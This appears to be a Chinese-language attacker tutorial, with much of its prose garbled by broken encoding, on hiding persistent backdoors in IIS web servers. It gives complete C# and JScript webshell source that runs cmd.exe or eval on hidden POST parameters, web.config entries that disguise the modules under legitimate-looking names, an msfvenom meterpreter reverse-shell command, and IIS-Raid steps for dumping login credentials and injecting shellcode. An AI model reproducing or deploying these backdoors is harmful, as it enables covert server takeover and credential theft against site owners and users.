IIS
IIS_Bin_Backdoor
From:https://github.com/WBGlIl/IIS_backdoor
IIS_backdoor_dll.dlๆพๅ
ฅ web ็ฎๅฝ็ bin ๆไปถๅคนไธญ้
็ฝฎ web.config ๆไปถ
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" />
</modules>
</system.webServer>
</configuration>
IIS_backdoor_shell.exeๆง่กๅฝไปค

ไฝฟ็จIISBackdoorๅคชๆๆพ๏ผๅฎนๆ่ขซ็ๅบๆฏๅ้จ๏ผ่ฟ้ๅฏนๅ้จๆนๅ



้ๆฐ็ๆ่งฃๅณๆนๆก๏ผdllๆพๅ
ฅbin็ฎๅฝ๏ผweb.configไฟฎๆนไธบ
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<modules>
<add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
</modules>
</system.webServer>
</configuration>
ๆทปๅ ๅฎไนๅไผ่ชๅจๅจๆจกๅไธญๆณจๅๅฅฝ

ๆง่กpayload๏ผmsf็ๆrawๆ ผๅผpayload๏ผ้ๆฉshellcode้้กน๏ผrawๆไปถๆๅ
ฅๅณๅฏ
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.raw

IIS_NETDLL_Spy
From:https://github.com/Ivan1ee/NetDLLSpy
ๅไฝ่
ๆๅไธ็งๆนๅผ๏ผ็ฌฌไธ็ง็ผ่ฏไปฃ็ ไธบDLLๆฐๅปบaspxๆไปถๅฎไพๅๅ้จ็ฑปๆฅๆง่กๅฝไปค๏ผ็ฌฌไบ็งๆฏๅhttphandlerๆ ๅฐๅฏๆๅฎไธไธชๅ็ผๆง่กๅฝไปคไฟๅญๆไปถๅจwebๆๅกๅจไธ๏ผๅ่ฏปๅ็ปๆใ็ฌฌไธ็งๆฏไฝฟ็จjsc.exe็ผ่ฏjs่ๆฌ็ๆdll๏ผๆทปๅ ๆ ๅฐ่ๅ่ฟๆฅใ
่ฟ้ๆ นๆฎๅไฝ่
็ไปฃ็ ๏ผ่ฟ่กไบไธไธ็ฎๅ็ไฟฎๆน๏ผไฟฎๆนๅ็ๅ่ฝไธบๆทปๅ httphandlerๆ ๅฐๆๅฎไธไธชๅ็ผๆง่กๅฝไปคๆพ็คบๅจ้กต้ขไธ๏ผไธ็จไฟๅญๅจๆๅกๅจไธญๅ่ฎฟ้ฎใ
ไปฃ็
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Web;
namespace IsapiModules
{
public class Handler : IHttpHandler
{
public bool IsReusable
{
get
{
return false;
}
}
public void ProcessRequest(HttpContext context)
{
string input = context.Request.Form["InternetInformationService"]; //command
if (context.Request.Form["microsoft"] == "iis")//do command
{
this.cmdShell(input);
}
}
public void cmdShell(string input)
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.UseShellExecute = false;
process.StartInfo.Arguments = "/c " + input;
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
StreamReader output = process.StandardOutput;
String result = output.ReadToEnd();
output.Close();
output.Dispose();
HttpContext.Current.Response.Write(result);
}
}
}
ไฟๅญไธบ้ๆๅ็ผ๏ผไฝฟ็จcsc็ผ่ฏใ
>C:\Windows\Microsoft.NET\Framework\v2.50727\csc.exe /t:library /r:System.Web.dll -out:C:\inetpub\wwwroot\Bin\SystemIO.dll C:\inetpub\wwwroot\bin\code.cs

Web.configๆไปถๆทปๅ
<system.webServer>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="Script" preCondition="integratedMode" />
</handlers>
</system.webServer>

ๆๅผIIS็ฎก็ๅจ๏ผๅฏไปฅ็ๅฐๅค็ๆ ๅฐ็ฎก็ๅจไธญๅทฒ็ปๆทปๅ ไบๆจกๅใ

็ฐๅจ้ๆ่ฎฟ้ฎไธชxxxๅ็ผ็ๆไปถ

ๅธฆๅๆฐ่ฎฟ้ฎ
microsoft=iis&InternetInformationService=net user


็ฌฌไธ็ง่ฟๆฅ่ๅ๏ผ่ฟ้ไนๅฏนไปฃ็ ไฟฎๆนไบไธไธใ
import System;
import System.Web;
import System.IO;
package IsapiModule
{
public class Handler implements IHttpHandler
{
function IHttpHandler.ProcessRequest(context : HttpContext)
{
context.Response.Write("404 Not Found")
var I = context;
var Request = I.Request;
var Response = I.Response;
var Server = I.Server;
eval(context.Request["Internet"]); //pass
}
function get IHttpHandler.IsReusable() : Boolean{ return true}
}
}
ไฝฟ็จjsc็ผ่ฏ
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe /t:library -out:C:\inetpub\wwwroot\Bin\IsapiModule.Handler.dll C:\inetpub\wwwroot\bin\code.js

็ผ่พweb.config๏ผๆทปๅ ๆ ๅฐ๏ผ่ฟ้ๆๅฎ็ๅ็ผๆฏ.iis
<system.webServer>
<modules runAllManagedModulesForAllRequests="true"/> <directoryBrowse enabled="true"/>
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
<handlers>
<add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode"/>
</handlers>
</system.webServer>
ๅทฒ่ชๅจๅ ๅ
ฅไบๆ ๅฐใ็ฐๅจ้ไพฟ่ฎฟ้ฎไธชiisๅ็ผ็ๆไปถใ


ๅฏไฝฟ็จ่ๅ็ดๆฅ่ฟๆฅ


IIS_RAID
From:https://github.com/0x09AL/IIS-Raid
ๅจvs2019ไธ็ผ่ฏ
ๅจFunctions.hไธญไฟฎๆน่ฟๆฅๅฏ็ ๏ผpassfileๆฏdumpไธๆฅ็ๅฏ็ ไฟๅญ็ไฝ็ฝฎ๏ผcom_headerๆฏๅ้จๅๆๅกๅจ้ไฟก็่ฏทๆฑๅคดใ

ๆๅผ้กน็ฎไฟฎๆนๅฎไฝ ็ๅฏ็ ๏ผ็ดๆฅctrl+B็ๆ่งฃๅณๆนๆกๅณๅฏ(่ฟ้็ๆ็ๆฏrelease็ๆฌ)
Dllไผ ๅฐๆๅกๅจ๏ผๆนไธชๅๅญ๏ผๆง่กๆทปๅ ๆจกๅ
>C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true

ๅจๆจกๅไธญๅฏไปฅ็ๅฐๅทฒ็ปๅญๅจไบ

่ฟ็จ่ฟๆฅ
>python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
ๆง่กๅฝไปค็ๆนๅผๆฏ
>cmd +ๅฝไปค

DumpๅฝไปคๅฏไปฅdumpไธๆฅIIS็ซ็น็็ปๅฝ็ไฟกๆฏ๏ผไฟๅญๅจ่ฎพ็ฝฎ็ไฝ็ฝฎใ
Injectๅฏไปฅๆง่กshellcode
Cs/msf็ๆrawๆ ผๅผ็shellcode
>inject ไฝ็ฝฎ

ๆๅๆดๆฐไบ
่ฟๆๅธฎๅฉๅ๏ผ